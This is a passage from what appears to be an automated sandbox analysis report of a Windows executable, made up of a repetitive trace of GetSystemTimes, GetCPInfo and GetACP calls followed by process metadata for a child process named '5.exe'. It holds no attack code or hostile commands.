lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.234] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.234] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.234] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.235] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.235] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.235] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.236] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.236] GetACP () returned 0x4e4 [0172.236] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.237] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.237] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.237] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.237] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.237] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.237] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.237] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.238] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.238] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.238] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.238] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.238] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.238] GetACP () returned 0x4e4 [0172.238] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.239] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.239] GetACP () returned 0x4e4 [0172.239] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.240] GetACP () returned 0x4e4 [0172.240] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.240] GetACP () returned 0x4e4 [0172.240] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.240] GetACP () returned 0x4e4 [0172.240] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.240] GetACP () returned 0x4e4 [0172.240] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.240] GetACP () returned 0x4e4 [0172.240] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.240] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.241] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.241] GetACP () returned 0x4e4 [0172.241] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.242] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.242] GetACP () returned 0x4e4 [0172.242] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.243] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.243] GetACP () returned 0x4e4 [0172.243] GetSystemTimes (lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) Process: id = "12" image_name = "5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe" page_root = "0x365b6000" os_pid = "0x130" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x6c8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4af56985-47a6-4393-a1ba-5c1d6d073033\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]